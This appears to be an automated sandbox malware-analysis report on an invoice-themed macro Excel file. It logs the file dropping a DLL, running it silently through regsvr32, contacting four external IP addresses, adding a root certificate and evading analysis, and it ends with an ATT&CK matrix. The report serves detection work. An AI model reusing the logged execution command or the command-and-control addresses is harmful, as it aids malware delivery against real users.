Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0017B780 VirtualAlloc,VirtualAlloc,NtSetInformationProcess,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0017BA14 NtSetInformationProcess,
Source: INV2680371456-20210111889374.xlsmOLE, VBA macro line: Private Sub view_1_a_Layout(ByVal Index As Long)
Source: VBA code instrumentationOLE, VBA macro: Module Sheet1, Function view_1_a_Layout
Source: INV2680371456-20210111889374.xlsmOLE indicator, VBA macros: true
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1840
Source: d0l359[1].rar.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: d0l359[1].rar.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: d0l359[1].rar.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: d0l359[1].rar.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DWWIN.EXE, 00000007.00000002.2244404885.0000000003360000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.expl.evad.winXLSM@9/21@1/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$INV2680371456-20210111889374.xlsmJump to behavior
Source: C:\Windows\System32\DWWIN.EXEMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2292
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD0F5.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\DWWIN.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\DWWIN.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: INV2680371456-20210111889374.xlsmVirustotal: Detection: 46%
Source: INV2680371456-20210111889374.xlsmReversingLabs: Detection: 32%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1840
Source: unknownProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1840
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1840
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1840
Source: C:\Windows\System32\DWWIN.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{713AACC8-3B71-435C-A3A1-BE4E53621AB1}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: INV2680371456-20210111889374.xlsmInitial sample: OLE zip file path = xl/media/image2.png
Source: INV2680371456-20210111889374.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: INV2680371456-20210111889374.xlsmInitial sample: OLE indicators vbamacros = False
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,
Source: d0l359[1].rar.0.drStatic PE information: section name: .rdata3
Source: d0l359[1].rar.0.drStatic PE information: section name: .2
Source: d0l359[1].rar.0.drStatic PE information: section name: .rdata2
Source: d0l359[1].rar.0.drStatic PE information: section name: .text4
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000400A push esi; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10010810 pushfd ; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000D856 push ebp; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000C265 push 588A19FDh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10020A73 push edx; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000FEBF push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000E8F3 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000FEFA push 00000000h; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10023EFF push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000C304 push 588A1BCDh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10010307 push esp; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000CF15 push 0000002Dh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1001DB23 push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10020B27 push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10002140 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1001CD9B push esp; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_1000DFC7 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10023FEB push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_100107FB pushfd ; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0017BFB0 push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00147172 push dword ptr [ebp+ecx*8-49h]; retf
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001662CD pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0015F6CD push esi; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0014899D push 00000369h; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001489CD push 00000369h; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0016FB74 push esi; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00141D11 push FFFFFFD5h; ret
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00140E8F push esi; ret
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\aymakjne.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rarJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\DWWIN.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001588DD rdtsc
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d0l359[1].rarJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2780Thread sleep time: -300000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -572000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -396000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -456000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -540000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -644000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -167000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -326000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -156000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -272000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -178000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -598000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -548000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -414000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -645000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -289000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -471000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -531000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -1460000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -246000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -176000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -620000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -532000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -298000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -344000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -465000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -128000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -293000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -700000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -678000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -242000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -918000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -489000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -292000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -417000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -426000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -696000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -348000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -173000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -594000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -580000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -268000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -494000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -316000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -358000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -566000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -588000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -889000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -918000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -650000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -316000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -300000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -252000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -253000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -492000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -282000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -276000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -1050000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -160000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -258000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -298000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -308000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -686000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -257000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -296000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -618000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -255000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -340000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -658000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -666000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -830000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -244000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -242000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -311000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -270000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -477000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -291000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -162000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -338000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -319000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -327000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -341000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -265000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -288000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -353000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -273000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -171000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -337000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -269000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -272000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -267000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -328000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -154000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -277000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -280000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -294000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -350000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -165000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep time: -310000s >= -30000s
Source: C:\Windows\System32\DWWIN.EXE TID: 2428Thread sleep time: -60000s >= -30000s
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information queried: ProcessInformation
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_001588DD rdtsc
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0017B5D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0017B6E0 mov eax, dword ptr fs:[00000030h]

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 80.86.91.27 236
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 5.100.228.233 61
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 46.105.131.65 232
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 77.220.64.37 187
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\aymakjne.dll.
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXEProcess created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1840
Source: regsvr32.exe, 00000003.00000002.2381902937.00000000008D0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382314697.0000000000C90000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: regsvr32.exe, 00000003.00000002.2381902937.00000000008D0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382314697.0000000000C90000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.2381902937.00000000008D0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2382314697.0000000000C90000.00000002.00000001.sdmpBinary or memory string: !Progman
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 BlobJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting22Path InterceptionProcess Injection112Masquerading11OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution43Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting22LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
